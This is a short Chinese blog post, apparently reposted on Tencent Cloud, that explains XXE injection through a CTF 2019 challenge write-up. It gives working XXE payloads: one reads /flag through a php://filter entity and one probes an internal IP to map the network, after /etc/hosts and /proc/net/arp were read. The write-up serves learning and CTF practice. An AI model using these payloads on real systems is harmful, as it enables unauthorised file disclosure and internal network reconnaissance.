前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >关于XXE「建议收藏」

关于XXE「建议收藏」

作者头像
全栈程序员站长
发布2022-08-31 16:59:55
1600
发布2022-08-31 16:59:55
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

NJUPT CTF2019:

做题的时候,抓包看了一下,响应XML格式消息,并没有严格过滤,这道题读文件,

代码语言:javascript
复制
<!DOCTYPE foo [
<!ENTITY  xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag" >]>
<ticket>
<username>&xxe;</username>
<code>aaaa</code>
</ticket>

通过读取/etc/hosts以及/proc/net/arp,推测主机ip:192.168.1.8

代码语言:javascript
复制
<!DOCTYPE foo [
<!ENTITY  xxe SYSTEM "http://192.168.1.8/" >]>
<ticket>
<username>&xxe;</username>
<code>aaaa</code>
</ticket>

漏洞解释: xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 常见的利用,就和上面的题一样,读文件,嗅探,Dos,Blind XXE

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/142474.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年5月2,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档